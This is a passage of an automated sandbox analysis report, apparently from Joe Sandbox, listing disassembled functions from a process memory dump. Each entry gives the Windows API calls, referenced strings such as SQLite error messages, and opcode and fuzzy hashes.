                                                        • Instruction Fuzzy Hash: 65229EB2600702DFDB15CF24C4A0B9BB7E4BF65318F44482DDAAE9B641DB31B991CB91
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$File$PointerRead_memset
                                                        • String ID:
                                                        • API String ID: 1220473449-0
                                                        • Opcode ID: 2dce7cf4c6510214781348c64dee212a8bebc38548a799af6b5cc2effd4334d1
                                                        • Instruction ID: c7c8398dd5bd9fe513ff044bd60b59081e45e44a456dce1eec9addb9723e3e65
                                                        • Opcode Fuzzy Hash: 2dce7cf4c6510214781348c64dee212a8bebc38548a799af6b5cc2effd4334d1
                                                        • Instruction Fuzzy Hash: 68118E72604208ABD710CEA9EC85ADABBACFB44220F500656FC2CC7680D671AD5087E0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: ($-journal
                                                        • API String ID: 2102423945-1587918665
                                                        • Opcode ID: 92038cc6a383ddecb216d8ae0418ec1efc569daff6a410d540df6a8ce4e7aa7d
                                                        • Instruction ID: 20a95b6b50bb6146ba5cb371a15fc8e6b50f18c939d440b63503c31f3b327cca
                                                        • Opcode Fuzzy Hash: 92038cc6a383ddecb216d8ae0418ec1efc569daff6a410d540df6a8ce4e7aa7d
                                                        • Instruction Fuzzy Hash: 73C1CCB19007469FDB10CF68C880BDABBF5AF56310F24866DD96DAB381E735E502CB91
                                                        APIs
                                                        • FindCloseChangeNotification.KERNEL32(?), ref: 214777E5
                                                        • Sleep.KERNEL32(00000064), ref: 214777F8
                                                        • CloseHandle.KERNEL32(?), ref: 21477802
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: Close$ChangeFindHandleNotificationSleep
                                                        • String ID:
                                                        • API String ID: 4133708355-0
                                                        • Opcode ID: 56db700161db7182b50ff08af765e554951086627f5d35615423c98ef14d89de
                                                        • Instruction ID: ec6babffd8291e708cac643bb1d24e4db5d627e488a20735dda24717905df213
                                                        • Opcode Fuzzy Hash: 56db700161db7182b50ff08af765e554951086627f5d35615423c98ef14d89de
                                                        • Instruction Fuzzy Hash: 8DE0927724030A6F92009AB9DCC4DC7B7ACEB465793510625FAADC3381DA75F483C670
                                                        APIs
                                                        • _malloc.LIBCMT ref: 214735E2
                                                          • Part of subcall function 214D643B: __FF_MSGBANNER.LIBCMT ref: 214D6454
                                                          • Part of subcall function 214D643B: __NMSG_WRITE.LIBCMT ref: 214D645B
                                                          • Part of subcall function 214D643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,214D84E8,00000000,00000001,00000000,?,214D91C7,00000018,214E9530,0000000C,214D9257), ref: 214D6480
                                                        Strings
                                                        • failed to allocate %u bytes of memory, xrefs: 21473600
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap_malloc
                                                        • String ID: failed to allocate %u bytes of memory
                                                        • API String ID: 501242067-1168259600
                                                        • Opcode ID: 6c7ee2757cfc1ee7c85de86607bf019e980580e8fafec07ea0bd6465e328d245
                                                        • Instruction ID: fa2d4b899563318fb905057921f20fa8cea66817d573939232dc00414e46b02d
                                                        • Opcode Fuzzy Hash: 6c7ee2757cfc1ee7c85de86607bf019e980580e8fafec07ea0bd6465e328d245
                                                        • Instruction Fuzzy Hash: B3E0EDB3A026156BC6108E9EEC009C2F7ED9FA0A75B05453AE92CCB290D230E51286D0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID:
                                                        • API String ID: 2102423945-0
                                                        • Opcode ID: d49f724bfc57ff056881ccfc2f64776627580c3b2d968b77fb2da9cf6968aa75
                                                        • Instruction ID: 7cbb94170fedd75fe77f1d37f87f55bb87c08323e148965c3c16bc735bd225db
                                                        • Opcode Fuzzy Hash: d49f724bfc57ff056881ccfc2f64776627580c3b2d968b77fb2da9cf6968aa75
                                                        • Instruction Fuzzy Hash: BBF0E5317102042BD630861ADC0AC97776DCFC2B24F0002A9FD1C87391E9729922C1E2
                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 21478C5E
                                                        • GetVersionExW.KERNEL32(?), ref: 21478C82
                                                        • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 21478CB7
                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 21478CF1
                                                        • _free.LIBCMT ref: 21478D22
                                                        • LocalFree.KERNEL32(?), ref: 21478D31
                                                        • _free.LIBCMT ref: 21478D71
                                                          • Part of subcall function 21477680: AreFileApisANSI.KERNEL32 ref: 21477686
                                                          • Part of subcall function 21477680: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 2147769E
                                                          • Part of subcall function 21477680: _malloc.LIBCMT ref: 214776AC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: FormatMessage_free$ApisByteCharErrorFileFreeLastLocalMultiVersionWide_malloc
                                                        • String ID: OsError 0x%x (%u)
                                                        • API String ID: 2308407681-2664311388
                                                        • Opcode ID: 5c3cb33ec5145c46cfe492ee26e3798c5c75be4cba6188fc94bab2f53d50c84a
                                                        • Instruction ID: b543215e74290324d4dcf79785a952ede9b2032eacb07c593a97317fa8cd5255
                                                        • Opcode Fuzzy Hash: 5c3cb33ec5145c46cfe492ee26e3798c5c75be4cba6188fc94bab2f53d50c84a
                                                        • Instruction Fuzzy Hash: E53174719011299FC725DF65CC89EDFBBB8EF59750F0045A8E50D97201DA345E82CFA4
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32 ref: 214D6B3C
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 214D6B51
                                                        • UnhandledExceptionFilter.KERNEL32(214E01D0), ref: 214D6B5C
                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 214D6B78
                                                        • TerminateProcess.KERNEL32(00000000), ref: 214D6B7F
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                        • String ID:
                                                        • API String ID: 2579439406-0
                                                        • Opcode ID: 7e6a3e1e7fac46ce498aa47ec985fe07075ffc69842b82eec9c95ba7736d59f1
                                                        • Instruction ID: 6cc1a52b656365057147a697a0e02c56aa8de7919b536b9f82bcae282c00f102
                                                        • Opcode Fuzzy Hash: 7e6a3e1e7fac46ce498aa47ec985fe07075ffc69842b82eec9c95ba7736d59f1
                                                        • Instruction Fuzzy Hash: 9521D0B5989204DFCB01DF65D589A443BB4FB48318F10405AE91E9BB43EFBA6B81CF49
                                                        APIs
                                                        • _memset.LIBCMT ref: 21488856
                                                          • Part of subcall function 21482D40: _memset.LIBCMT ref: 21482D6C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                        • API String ID: 2102423945-1231421067
                                                        • Opcode ID: 0badc61a04591b7cc5356da818f32afabdfc946256fdd8033d7a041ccc857a48
                                                        • Instruction ID: 0c59ca31226dcb3771d7c047e45838ea133c3cabcd3a522385930832daee5969
                                                        • Opcode Fuzzy Hash: 0badc61a04591b7cc5356da818f32afabdfc946256fdd8033d7a041ccc857a48
                                                        • Instruction Fuzzy Hash: 94E1D571A043539FD305CF28C880A1ABBE1BF95310F1A89ADE95C9F382D731E945CB92
                                                        APIs
                                                        • GetSystemTime.KERNEL32(?), ref: 21479804
                                                        • GetCurrentProcessId.KERNEL32 ref: 2147982F
                                                        • GetTickCount.KERNEL32 ref: 21479844
                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 2147985B
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                        • String ID:
                                                        • API String ID: 4122616988-0
                                                        • Opcode ID: afa11b6a534d960cd54fe5ab525eb808400c02c0ce4261e24e2b5bb485b613ef
                                                        • Instruction ID: f892c60b4d208bcbefb63a2081caa0d30d023b7762657c9e0c69a6c8db25fdfd
                                                        • Opcode Fuzzy Hash: afa11b6a534d960cd54fe5ab525eb808400c02c0ce4261e24e2b5bb485b613ef
                                                        • Instruction Fuzzy Hash: 52216FB6A0061ADBCB04CFA8D5848ADFBF5FB48320B50857DD81E93744CB35BA41CB90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                        • API String ID: 0-1231421067
                                                        • Opcode ID: 8dbb05d8a066fd8682137b6c37602627d0ef67cf852c0a8f4f008357a0f1ce59
                                                        • Instruction ID: 4b7299292511fe76a0e416c94c13915083ecb015ad312c620d690f900c0d4e05
                                                        • Opcode Fuzzy Hash: 8dbb05d8a066fd8682137b6c37602627d0ef67cf852c0a8f4f008357a0f1ce59
                                                        • Instruction Fuzzy Hash: A3C1F271A042119FD315CF28DC80A6AB3E6FB95760F168A6DE95D8F381E731E912CBC1
                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2147BD48
                                                        • _memset.LIBCMT ref: 2147BEA4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_memset
                                                        • String ID: 0
                                                        • API String ID: 121741435-4108050209
                                                        • Opcode ID: 452fbee5e86a6547cd429b17fb140330e4e3b972a02b043bf613c701d322eef9
                                                        • Instruction ID: adfdb7e873112f175f6cccbbf75362dff10edef81fffb4c1a011f297e99efbeb
                                                        • Opcode Fuzzy Hash: 452fbee5e86a6547cd429b17fb140330e4e3b972a02b043bf613c701d322eef9
                                                        • Instruction Fuzzy Hash: 4771ADB0A00B469FD724CF79C484A9AFBF5FF95200F10866DD54A87B42D730EA56CBA1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID:
                                                        • API String ID: 2102423945-0
                                                        • Opcode ID: e33be670b7610db258a37d551fb1faf289d3470661de6a5d27f092cb3a3b7303
                                                        • Instruction ID: 861d2c2fe12203aaee83ba54ece32b36a8e61caba3480bd12732348d0fa967eb
                                                        • Opcode Fuzzy Hash: e33be670b7610db258a37d551fb1faf289d3470661de6a5d27f092cb3a3b7303
                                                        • Instruction Fuzzy Hash: D04188B06043119BE700CF24C881A5BBFB4BF8AB08F00095EEE499B356C775E955CBD2
                                                        APIs
                                                        • GetSystemInfo.KERNEL32(214EEC40,214733B4,?,214D36AD), ref: 214799A4
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 9c81c27062556f1d2b9216ffdd4e515ee3309cef6e88f28ab814ff10d633e588
                                                        • Instruction ID: bacd4893cfbc357d76e1f00beae3780730e9a4dfb8f7379eea3b890d2fc2337b
                                                        • Opcode Fuzzy Hash: 9c81c27062556f1d2b9216ffdd4e515ee3309cef6e88f28ab814ff10d633e588
                                                        • Instruction Fuzzy Hash: C2011EF1C822559FE762DF78D8496563BF0BB09611B24093AD80DE230AFF3C4525CB82
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 20ced9440884e890e0141492ca51b50e5f6c98718ede2831ce75e7af2758eca8
                                                        • Instruction ID: e5093c0c493b3c56225724a272b310c6553134fd19637123c52e41b5c0b7072e
                                                        • Opcode Fuzzy Hash: 20ced9440884e890e0141492ca51b50e5f6c98718ede2831ce75e7af2758eca8
                                                        • Instruction Fuzzy Hash: F1512A75A00209DFCB04CF58D880AAAB7B4FF99714F0585AEE90D9B315E732EA15CBD0
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5c90467746f7e170f2f585bf74f5f1b6eb840bbb65ddb66d9357f2ad08e08f58
                                                        • Instruction ID: 48b1313f868ccb6a96701209525e3bd064169ea07cb3a86cfe79737b503ffe90
                                                        • Opcode Fuzzy Hash: 5c90467746f7e170f2f585bf74f5f1b6eb840bbb65ddb66d9357f2ad08e08f58
                                                        • Instruction Fuzzy Hash: 7941F576704205AFDB00DF19E880E6ABBA8EF94335F5846A9FE1C8B341DA31E910C7D1
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4fd81ba82909e639443833f1520046f05d05b770f0d9c188cb5e68ea0dc8049b
                                                        • Instruction ID: ec81824ced200ea9bb942934175fbf33719a0e8dcbb8305b9bf302ebe4308e4e
                                                        • Opcode Fuzzy Hash: 4fd81ba82909e639443833f1520046f05d05b770f0d9c188cb5e68ea0dc8049b
                                                        • Instruction Fuzzy Hash: 00115BB0700606AFCB04CF1CE980966B7E8FF98314B144229E918C7B00E771F961CBD5
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6dc50cb2a3ed8ff631e1ec02a32ae8dff541395dafe3410548e3845e0152ab21
                                                        • Instruction ID: 104affd832f11c467c8bd71fa32c99017fb269a3c3d1f8ce3d6c28c4abb9b6f3
                                                        • Opcode Fuzzy Hash: 6dc50cb2a3ed8ff631e1ec02a32ae8dff541395dafe3410548e3845e0152ab21
                                                        • Instruction Fuzzy Hash: 53F062716001069FCB00EF2DDD84856BBA8EF45215F450569ED58C7315EB31F925CBD2
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 335bd9add436b5b890f15a3108ebaa61b4ea49c47f65e77cb493bc5058e516ce
                                                        • Instruction ID: 15065e5c231ca75ff48dc16ee0ed351a6497d32ba95e156dcb738a7bfdd6b0cb
                                                        • Opcode Fuzzy Hash: 335bd9add436b5b890f15a3108ebaa61b4ea49c47f65e77cb493bc5058e516ce
                                                        • Instruction Fuzzy Hash: C4E0D8F6A152093FF7054678EC9174A7FC8571E238F24066AF91DCF342E576E5508690
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe949f4db79c0fb07479b10b96d6eb37ab230a312b52561a4276eabf098e6e51
                                                        • Instruction ID: 59e2760bab7875530a6f2c061d536b818c4b12ed5b69f01f8adf51b6e8f96103
                                                        • Opcode Fuzzy Hash: fe949f4db79c0fb07479b10b96d6eb37ab230a312b52561a4276eabf098e6e51
                                                        • Instruction Fuzzy Hash: 96F03070059284AFE712AB14D458BA83F985B16308F6444DEE94C0F362D2B7D4CAC751
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a890737bfd37e83267eeeb0658fabb3551758157130f918969f7a3acfa2a2ea2
                                                        • Instruction ID: 85f8608e037c853df5b3f84b61b135f026dc44ac07ae76ce307cf790d104dc2a
                                                        • Opcode Fuzzy Hash: a890737bfd37e83267eeeb0658fabb3551758157130f918969f7a3acfa2a2ea2
                                                        • Instruction Fuzzy Hash: 0EE086733115259F4700AE99E48089E7B99FB85A79715006BEA0DCB600D332FC0153D1
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a990d16668da41ac522f0c8696cb9c6cb42081b70db5606a9d3051ff2f62d492
                                                        • Instruction ID: bfb3887e002347f1e7459a2481b16e58a616b891263144c85ca74a913b9be24e
                                                        • Opcode Fuzzy Hash: a990d16668da41ac522f0c8696cb9c6cb42081b70db5606a9d3051ff2f62d492
                                                        • Instruction Fuzzy Hash: 27E0127A3001055B8B01DA5DD94489B3BECAF895617590065FA5DC7301EB31EE1187E1
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 221c8917cc634ef3a2dbea97f878f095456748329b0bb4858dca2e0b7b0aed3e
                                                        • Instruction ID: 29b91c3df1d4c1de0a154e45410c959a9e64dbe5ea94f08b72619fe83f08e50f
                                                        • Opcode Fuzzy Hash: 221c8917cc634ef3a2dbea97f878f095456748329b0bb4858dca2e0b7b0aed3e
                                                        • Instruction Fuzzy Hash: AFD09EBA6042096FDB00DE48ECC1EAB77ADAB5C614F544504BE1C47341D571F96087B5
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c5a6df418152a03dd52473d9eed5b963773734f5fdfe09b25e6c6c2140b9cea4
                                                        • Instruction ID: b96e54ef5bd2d32228545678bbf69b76aeecaaa22ea21c9a1bb699fe810fe403
                                                        • Opcode Fuzzy Hash: c5a6df418152a03dd52473d9eed5b963773734f5fdfe09b25e6c6c2140b9cea4
                                                        • Instruction Fuzzy Hash: 44D09EBA6042096FDB00DE48ECC2DAB77ADAB5C614F848504BE1C47341D571FD6087B5
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9061127f8f84489ae12ac5f7fb4400e51eb8437db0284a13a9696f7abbe481b9
                                                        • Instruction ID: bb8120dc1ef9a2606aff1475201eddea0a0d4b88e3e631b882ec744ede701855
                                                        • Opcode Fuzzy Hash: 9061127f8f84489ae12ac5f7fb4400e51eb8437db0284a13a9696f7abbe481b9
                                                        • Instruction Fuzzy Hash: 20D09EBA6142096FDB00DE48ECC1DAB77ADAB5C614F444504BE1C47341D571F96087B5
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c1f1daf6b4b04424e48a67e25c879642ab23ced374421459458b6fbd06bd0bad
                                                        • Instruction ID: 7aa584f7c60d0545bdd53bdafb26a5fabd087ec99db770a3a3005b4594d8fe54
                                                        • Opcode Fuzzy Hash: c1f1daf6b4b04424e48a67e25c879642ab23ced374421459458b6fbd06bd0bad
                                                        • Instruction Fuzzy Hash: FED0C9E65106486F9714EE5CDC45CBA339DD755624B444648BD2C87281EA31EA2087E5
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 458186326f1e19d1f857594071c0f5f09dffa51a2e27790996bdfb7284bd579b
                                                        • Instruction ID: 1e8486a0bb7a3e1b74bf871211d1ba509bed808eb5061ecaa61e19231ca5fec3
                                                        • Opcode Fuzzy Hash: 458186326f1e19d1f857594071c0f5f09dffa51a2e27790996bdfb7284bd579b
                                                        • Instruction Fuzzy Hash: 49C09232354A0D8AAB008EE9F88497B3BDCAB44D6878900A6F90CCA605E635E890D1D0
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,214D682D,214E9420,00000008,214D69C1,?,?,?,214E9440,0000000C,214D6A7C,?), ref: 214D8364
                                                        • __mtterm.LIBCMT ref: 214D8370
                                                          • Part of subcall function 214D803B: DecodePointer.KERNEL32(0000000A,214D68F0,214D68D6,214E9420,00000008,214D69C1,?,?,?,214E9440,0000000C,214D6A7C,?), ref: 214D804C
                                                          • Part of subcall function 214D803B: TlsFree.KERNEL32(00000025,214D68F0,214D68D6,214E9420,00000008,214D69C1,?,?,?,214E9440,0000000C,214D6A7C,?), ref: 214D8066
                                                          • Part of subcall function 214D803B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,214D68F0,214D68D6,214E9420,00000008,214D69C1,?,?,?,214E9440,0000000C,214D6A7C,?), ref: 214D9129
                                                          • Part of subcall function 214D803B: _free.LIBCMT ref: 214D912C
                                                          • Part of subcall function 214D803B: DeleteCriticalSection.KERNEL32(00000025,?,?,214D68F0,214D68D6,214E9420,00000008,214D69C1,?,?,?,214E9440,0000000C,214D6A7C,?), ref: 214D9153
                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 214D8386
                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 214D8393
                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 214D83A0
                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 214D83AD
                                                        • TlsAlloc.KERNEL32(?,?,214D682D,214E9420,00000008,214D69C1,?,?,?,214E9440,0000000C,214D6A7C,?), ref: 214D83FD
                                                        • TlsSetValue.KERNEL32(00000000,?,?,214D682D,214E9420,00000008,214D69C1,?,?,?,214E9440,0000000C,214D6A7C,?), ref: 214D8418
                                                        • __init_pointers.LIBCMT ref: 214D8422
                                                        • EncodePointer.KERNEL32(?,?,214D682D,214E9420,00000008,214D69C1,?,?,?,214E9440,0000000C,214D6A7C,?), ref: 214D8433
                                                        • EncodePointer.KERNEL32(?,?,214D682D,214E9420,00000008,214D69C1,?,?,?,214E9440,0000000C,214D6A7C,?), ref: 214D8440
                                                        • EncodePointer.KERNEL32(?,?,214D682D,214E9420,00000008,214D69C1,?,?,?,214E9440,0000000C,214D6A7C,?), ref: 214D844D
                                                        • EncodePointer.KERNEL32(?,?,214D682D,214E9420,00000008,214D69C1,?,?,?,214E9440,0000000C,214D6A7C,?), ref: 214D845A
                                                        • DecodePointer.KERNEL32(Function_000681BF,?,?,214D682D,214E9420,00000008,214D69C1,?,?,?,214E9440,0000000C,214D6A7C,?), ref: 214D847B
                                                        • __calloc_crt.LIBCMT ref: 214D8490
                                                        • DecodePointer.KERNEL32(00000000,?,?,214D682D,214E9420,00000008,214D69C1,?,?,?,214E9440,0000000C,214D6A7C,?), ref: 214D84AA
                                                        • GetCurrentThreadId.KERNEL32 ref: 214D84BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                        • API String ID: 3698121176-3819984048
                                                        • Opcode ID: ff0407561711a2dedd1516530ca493012476f506ee75f59f5bbd6306925d9864
                                                        • Instruction ID: 05b49475a5fc98d9e9077e144efe0989999e6b815bb7bb4b6c6c316ba7e86d9a
                                                        • Opcode Fuzzy Hash: ff0407561711a2dedd1516530ca493012476f506ee75f59f5bbd6306925d9864
                                                        • Instruction Fuzzy Hash: 0D3161729812169EDB115FB5D858A2A3EE4EB59B60720063EE81CE3257EF39A441CF50
                                                        APIs
                                                        • _memset.LIBCMT ref: 21478144
                                                        • UnlockFileEx.KERNEL32(?,?,?,FFFFFFFF,00000000,00000001,00000000,?), ref: 21478371
                                                        • GetLastError.KERNEL32(?,?,?,FFFFFFFF,00000000,00000001,00000000,?), ref: 2147837B
                                                        Strings
                                                        • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 21478229
                                                        • cannot open file at line %d of [%.10s], xrefs: 21478233
                                                        • %s-shm, xrefs: 21478159
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
